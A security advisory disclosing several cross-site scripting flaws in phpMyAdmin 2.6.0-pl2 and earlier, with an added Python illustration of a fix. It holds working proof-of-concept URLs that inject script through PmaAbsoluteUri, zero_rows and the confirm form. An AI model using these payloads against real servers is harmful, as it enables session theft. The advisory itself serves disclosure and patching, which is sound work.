
netVigilance Security Advisory 5

Multiple XSS Vulnerabilities in phpMyAdmin 2.6.0-pl2 and prior


Description:
If the configuration parameter $cfg['PmaAbsoluteUri'] is not set in the config.inc.php file, the auto-detect process can be used to conduct XSS attacks.

The "Zero Rows" parameter from read_dump.php can be exploited to conduct XSS attacks when the MySQL database returns an empty (zero-row) result.

The confirm page form inputs can be used to conduct XSS attacks.

Summary:
phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW. There are multiple vulnerabilities in the current stable version of phpMyAdmin that may allow an attacker to conduct XSS attacks.

Release Date:
November 18 2004

Severity:
Medium

SecureScout Testcase ID:
17927, 17928, 17929

Vulnerable Systems:
Latest stable version 2.6.0-pl2 and prior (minimum version for PmaAbsoluteUri XSS is 2.3)

Vulnerability Type:
XSS (Cross-Site Scripting): forcing a web site to display malicious content to the target by sending a specially crafted request to the web site. The vulnerable web site is not itself the target of the attack; it is used by the attacker as a vehicle against the victim.

Vendor Status:
The information has been provided to the phpMyAdmin Project Managers.
A new release 2.6.0-pl3 including all the patches is now available.

http://www.phpmyadmin.net/home_page/
http://www.phpmyadmin.net/home_page/relnotes.php?rel=0

Example:
I - Cross Site Scripting (PmaAbsoluteUri)
(Medium Risk)
From phpMyAdmin Documentation: "Starting with version 2.3.0, you can try to leave this parameter empty, because the program tries to auto-detect its proper value. Additional details are in the configuration file."

The algorithm computing this absolute URI is defined in the common.lib.php file and, in the case of a GET request, behaves as follows.
File : libraries/common.lib.php

        // rabus: if php is in CGI mode, $PHP_SELF often contains the path to the CGI executable.
        //   This is why we try to get the path from $REQUEST_URI or $PATH_INFO first.
        if (isset($REQUEST_URI)) {
            $cfg['PmaAbsoluteUri']      .= substr($REQUEST_URI, 0, strrpos($REQUEST_URI, '/') + 1);
        } else if (isset($PATH_INFO)) {
            $cfg['PmaAbsoluteUri']      .= substr($PATH_INFO, 0, strrpos($PATH_INFO, '/') + 1);
        } else {
            $cfg['PmaAbsoluteUri']      .= substr($PHP_SELF, 0, strrpos($PHP_SELF, '/') + 1);
        }


(from PHP Manual ==> strrpos -- Find position of last occurrence of a char in a string)

In the case of the following URL pattern :
'HTTP://[target]/[phpMyAdmin_directory]/[file]?[parameters]' $cfg['PmaAbsoluteUri'] will be equal to 'HTTP://[target]/[phpMyAdmin_directory]'

BUT if an additional '/' is added in the [parameters] block, like 'HTTP://[target]/[phpMyAdmin_directory]/[file]?[parameters1]/[parameters2]' then $cfg['PmaAbsoluteUri'] will be equal to 'HTTP://[target]/[phpMyAdmin_directory]/[file]?[parameters1]'

Now, if we look into the PHP file that embeds this variable into the HTML data when a GET /main.php is done, we obtain

file : libraries/header_meta_style.inc.php

    <?php
    if (!empty($GLOBALS['cfg']['PmaAbsoluteUri'])) {
        echo '<base href="' . $GLOBALS['cfg']['PmaAbsoluteUri'] . '" />' . "\n";
    }
    ?>

So, when $cfg['PmaAbsoluteUri'] is not defined in config.inc.php, an attacker can conduct an XSS attack with the following URL.
Exploit example:

-- HTTP Request --

[parameters1] = "><script>alert(document.cookie)</script><

http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></

-- HTTP Request --

-- HTTP Reply --
...
<base href="http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></" />
...
--HTTP Reply --
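The following is an added illustration, not code from the advisory or from phpMyAdmin: a Python model of the substr/strrpos auto-detect step shown above, next to a hardened variant that derives the base URI from the path component only and escapes the attribute value before emitting the <base> tag. The host and directory names are constructed placeholders.

```python
import html
from urllib.parse import urlsplit

# Constructed sample values modelled on the advisory's URL pattern; "[target]"
# and "phpMyAdmin" are placeholders, not real hosts or paths.
SCHEME_HOST = "http://[target]"
BENIGN_URI = "/phpMyAdmin/main.php?lang=en"
HOSTILE_URI = '/phpMyAdmin/main.php?"><script>alert(document.cookie)</script></'


def pma_absolute_uri_autodetect(request_uri: str) -> str:
    """Model of the 2.6.0-pl2 step:
    substr($REQUEST_URI, 0, strrpos($REQUEST_URI, '/') + 1).
    strrpos scans the whole request URI, query string included, so a '/'
    placed after '?' pulls the client-controlled query string into the result.
    """
    pos = request_uri.rfind("/")
    length = pos + 1 if pos != -1 else 1  # PHP: false + 1 == 1 when no '/' found
    return SCHEME_HOST + request_uri[:length]


def pma_absolute_uri_hardened(request_uri: str) -> str:
    """Illustrative fix (not the project's own patch): discard query and
    fragment first, then take the path up to and including its last '/'.
    Query data can no longer reach the computed base URI."""
    path = urlsplit(request_uri).path
    return SCHEME_HOST + path[: path.rfind("/") + 1]


def base_tag_unescaped(uri: str) -> str:
    """The rendering from header_meta_style.inc.php: value concatenated as-is."""
    return '<base href="' + uri + '" />'


def base_tag(uri: str) -> str:
    """Same element, but the attribute value is HTML-escaped
    (the equivalent of PHP's htmlspecialchars with ENT_QUOTES)."""
    return '<base href="%s" />' % html.escape(uri, quote=True)


if __name__ == "__main__":
    # The unescaped tag built from the auto-detected value carries the payload;
    # the hardened derivation never contains it, and escaping neutralises it anyway.
    print(base_tag_unescaped(pma_absolute_uri_autodetect(HOSTILE_URI)))
    print(base_tag(pma_absolute_uri_autodetect(HOSTILE_URI)))
    print(base_tag(pma_absolute_uri_hardened(HOSTILE_URI)))
```

The same output escaping in base_tag is the treatment the zero_rows echo in sections II and III needs; the path-only derivation is what removes the root cause for section I.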

                     -------------------------------------------

II - Cross Site Scripting (zero_rows)
(Medium Risk)

When performing a request to 'read_dump.php', a variable called 'zero_rows' can be used to display a specific message when the result from the MySQL server doesn't contain any row. This variable is not properly sanitized, permitting an XSS attack whenever the database returns a zero-row answer.

This zero-row answer can be triggered by a request like 'set @1=1'.

Exploit example:

-- HTTP Request --

http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=set%20@1=1&zero_rows=<script>alert(document.cookie)</script>
-- HTTP Request --

-- HTTP Reply--
...
<th bgcolor="#D3DCE3">
<b><script>alert(document.cookie)</script> (Query took 0.0009 sec)</b>
</th> ...
-- HTTP Reply --

                     -------------------------------------------

III - Cross Site Scripting (Confirm form)
(Medium Risk)

For some specific SQL statements a confirm page may be needed.
This confirm page (generated by sql.php) will embed a form which can be used to conduct an XSS attack.

Exploit example:
(2 XSS will be triggered due to XSS[1])

-- HTTP Request --

http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=drop%20database%20EXAMPLE&zero_rows="><script>alert(document.cookie)</script><input%20type=hidden%20value="/
-- HTTP Request --

-- HTTP Reply--
...
<base href="http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=drop%20database%20EXAMPLE&zero_rows="><script>alert(document.cookie)</script><input%20type=hidden%20value="/" />
...
<input type="hidden" name="sql_query" value="drop+database+EXAMPLE" />
<input type="hidden" name="zero_rows" value=""><script>alert(document.cookie)</script><input type=hidden value="/" /> ...
-- HTTP Reply --

                     -------------------------------------------

IV - Punctuation strings not sanitized before being displayed
(Low risk)

When phpMyAdmin fails to parse a query, the offending string is displayed on the STR line without being sanitized (unlike the SQL line).

-- HTTP Request --

http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=<></>
-- HTTP Request --

-- HTTP Reply --
...
ERROR: Unknown Punctuation String @ 1
STR: <></>
SQL: <></>
...
-- HTTP Reply --

Credits:
Cedric Cochin, Security Expert
Director of Product Integration, netVigilance, Inc. (www.netvigilance.com)
< cco [at] www.netvigilance.com >
